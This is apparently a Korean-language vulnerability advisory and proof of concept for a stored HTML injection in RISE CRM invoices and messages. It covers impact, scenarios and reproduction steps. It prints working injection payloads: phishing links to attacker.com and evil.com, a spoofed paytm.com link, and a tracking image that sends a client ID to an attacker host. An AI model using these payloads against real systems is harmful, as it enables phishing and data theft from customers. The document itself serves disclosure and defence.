
# RISE CRM 저장형 HTML 인젝션 PoC RISE CRM의 저장형 HTML 인젝션에 대한 개념 증명(PoC)으로, 인증된 사용자가 인보이스와 메시지에 악성 HTML을 주입할 수 있음을 보여줍니다. 이를 통해 자동화된 이메일과 PDF를 경유한 피싱 및 악성코드 유포가 가능해집니다.
⚠️ 보안 권고
인보이스, 메시징 및 자동화 커뮤니케이션에 영향을 미치는 치명적인 저장형 HTML 인젝션 취약점
RISE Ultimate Project Manager & CRM에서 인증된 사용자가 인보이스 품목, 고객 메모 및 메시징 모듈에 악성 HTML을 주입할 수 있는 치명적인 저장형 HTML 인젝션 취약점이 발견되었습니다. 주입된 콘텐츠는 데이터베이스에 영구 저장되며 고객 대상 이메일, PDF 및 채팅 커뮤니케이션에서 자동으로 렌더링되어 대규모 피싱 공격, 비즈니스 이메일 침해(BEC) 및 이메일/PDF 기반 악성코드 유포를 가능하게 합니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2025-60378 |
| 유형 | 저장형 HTML 인젝션 |
| CWE | CWE-79 |
| 공격 경로 | 네트워크/원격 |
| 인증 | 필요 (낮은 권한) |
| 사용자 상호작용 | 없음 |
| 심각도 | 높음(HIGH) |
| CVSS v3.1 | 8.1 - 높음 |
| 발견자 | Ajansha Shankar |
RISE CRM은 인보이스, 메시지 및 고객 메모를 포함한 여러 사용자 편집 가능 필드에서 HTML 콘텐츠를 적절히 검증(sanitize)하고 인코딩하지 못합니다. 인증된 사용자가 이러한 필드에 HTML 페이로드를 주입하면 콘텐츠가 적절한 필터링 없이 데이터베이스에 저장됩니다. 이후 이 악성 HTML은 적절한 이스케이프 처리 없이 고객 대상 이메일, PDF 첨부 파일 및 메시징/채팅 모듈에서 자동으로 렌더링됩니다. 반복 인보이스와 자동화된 메시징은 악성 콘텐츠를 동시에 여러 수신자에게 배포하여 공격을 증폭시킵니다.
| 요소 | 영향 | 설명 |
|---|---|---|
| 기밀성 | 🔴 높음 | 피싱을 통해 고객 자격 증명 및 민감한 데이터 탈취 가능 |
| 무결성 | 🔴 높음 | 악성 콘텐츠가 커뮤니케이션 및 비즈니스 관계에 대한 인식을 조작할 수 있음 |
| 가용성 | 🟡 낮음 | 시스템 가용성에 대한 직접적인 영향은 제한적 |
낮은 권한의 프로젝트 관리자 접근 권한을 가진 공격자가 악성 HTML이 포함된 인보이스를 생성합니다:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
인보이스는 자동 이메일을 통해 100명 이상의 고객에게 전송됩니다. 모든 고객은 피싱 사이트로 안내하는 정상적인 인보이스처럼 보이는 콘텐츠를 받게 됩니다. 공격자는 동시에 여러 피해자로부터 자격 증명을 탈취합니다.
공격자가 고객 메시지에 악성 HTML을 주입합니다:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
모든 팀 구성원과 고객이 채팅에서 메시지를 받고, 링크를 클릭하여 악성코드를 다운로드하게 됩니다.
공격자가 악성코드 전달 페이로드가 포함된 반복 인보이스를 설정합니다. 매월 고객은 악성 콘텐츠가 포함된 인보이스를 자동으로 받게 되어 지속적인 공격 벡터를 제공합니다.
이동: RISE CRM 대시보드 → 인보이스/메시지 → 새로 만들기
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ 주입된 HTML이 이스케이프 없이 이메일, PDF 및 메시징에서 렌더링됨 ✅ 링크가 클릭 가능하며 공격자 사이트로 리디렉션됨 ✅ 이미지가 공격자 통제 서버에서 로드됨 ✅ 콘텐츠가 향후 모든 고객 커뮤니케이션에 영구 유지됨 ✅ 반복 배포가 여러 수신자에게 자동으로 도달함
| 날짜 | 이벤트 |
|---|---|
| TBD | 취약점 발견 |
| TBD | 공급업체에 통보 |
| TBD | CVE-2025-60378 배정 |
| TBD | 패치 출시 (v3.9.4) |
| TBD | 공개 공개 |
발견자: Ajansha Shankar
벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
점수: 8.1 (높음)
세부 분석:
질문 또는 추가 정보가 필요한 경우:
⭐ 이 연구가 도움이 되었다면 이 저장소에 스타(star)를 부여해 주시기 바랍니다!
🔔 최신 정보 유지: 이 저장소를 워치(watch)하여 이번 및 향후 보안 연구에 대한 업데이트를 확인하세요.